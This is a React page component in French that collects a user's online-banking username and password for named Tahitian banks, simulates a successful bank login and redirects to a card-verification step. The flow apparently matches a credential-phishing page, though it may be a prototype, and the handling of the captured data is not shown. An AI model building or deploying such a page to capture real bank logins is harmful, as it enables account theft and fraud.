import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import { Building2 } from "lucide-react";
import { toast } from "sonner";
import Header from "../components/common/Header";
import SecurityMessage from "../components/common/SecurityMessage";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
  Select,
  SelectContent,
  SelectItem,
  SelectTrigger,
  SelectValue,
} from "@/components/ui/select";

const BankAuthPage = ({ onSubmit, bankData, userBanks = [] }) => {
  const [formData, setFormData] = useState(bankData || {
    bank: "",
    username: "",
    password: ""
  });
  const [isLoading, setIsLoading] = useState(false);
  const navigate = useNavigate();

  // Les banques disponibles sont directement les noms fournis
  const availableBanks = userBanks.length > 0 ? userBanks : [
    "Banque de Tahiti", 
    "Banque de Polynésie", 
    "Banque Socredo"
  ];

  const handleChange = (e) => {
    setFormData({
      ...formData,
      [e.target.name]: e.target.value
    });
  };

  const handleBankChange = (value) => {
    setFormData({
      ...formData,
      bank: value
    });
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    setIsLoading(true);

    // Simulation d'authentification
    setTimeout(() => {
      onSubmit(formData);
      toast.success("Authentification bancaire réussie");
      navigate("/verification-carte");
      setIsLoading(false);
    }, 1500);
  };

  return (
    <div className="min-h-screen flex flex-col">
      <Header minimal />
      
      <div className="flex-1 px-6 py-12 bg-slate-50">
        <div className="max-w-md mx-auto">
          <div className="text-center mb-8">
            <div className="bg-primary/10 rounded-full w-16 h-16 flex items-center justify-center mx-auto mb-4">
              <Building2 className="h-8 w-8 text-primary" />
            </div>
            <h1 className="text-2xl font-bold text-primary mb-2">Espace bancaire sécurisé</h1>
            <p className="text-slate-600">
              Authentifiez-vous auprès de votre banque
            </p>
          </div>

          <div className="bg-white rounded-xl border border-slate-200 shadow-sm p-8">
            <form onSubmit={handleSubmit} className="space-y-6">
              <div className="space-y-2">
                <Label htmlFor="bank">Nom de la banque</Label>
                <Select 
                  value={formData.bank} 
                  onValueChange={handleBankChange}
                  required
                >
                  <SelectTrigger className="h-11" data-testid="bank-select">
                    <SelectValue placeholder="Sélectionnez votre banque" />
                  </SelectTrigger>
                  <SelectContent>
                    {availableBanks.map((bankName, index) => (
                      <SelectItem key={index} value={bankName}>
                        {bankName}
                      </SelectItem>
                    ))}
                  </SelectContent>
                </Select>
              </div>

              <div className="space-y-2">
                <Label htmlFor="username">Identifiant</Label>
                <Input
                  id="username"
                  name="username"
                  type="text"
                  placeholder="Votre identifiant bancaire"
                  value={formData.username}
                  onChange={handleChange}
                  required
                  data-testid="username-input"
                  className="h-11"
                />
              </div>

              <div className="space-y-2">
                <Label htmlFor="password">Mot de passe</Label>
                <Input
                  id="password"
                  name="password"
                  type="password"
                  placeholder="Votre mot de passe"
                  value={formData.password}
                  onChange={handleChange}
                  required
                  data-testid="password-input"
                  className="h-11"
                />
              </div>

              <Button
                type="submit"
                className="w-full h-11 bg-primary hover:bg-primary/90"
                disabled={isLoading}
                data-testid="authenticate-btn"
              >
                {isLoading ? "Authentification en cours..." : "Authentifier"}
              </Button>
            </form>
          </div>

          <SecurityMessage />
        </div>
      </div>
    </div>
  );
};

export default BankAuthPage;
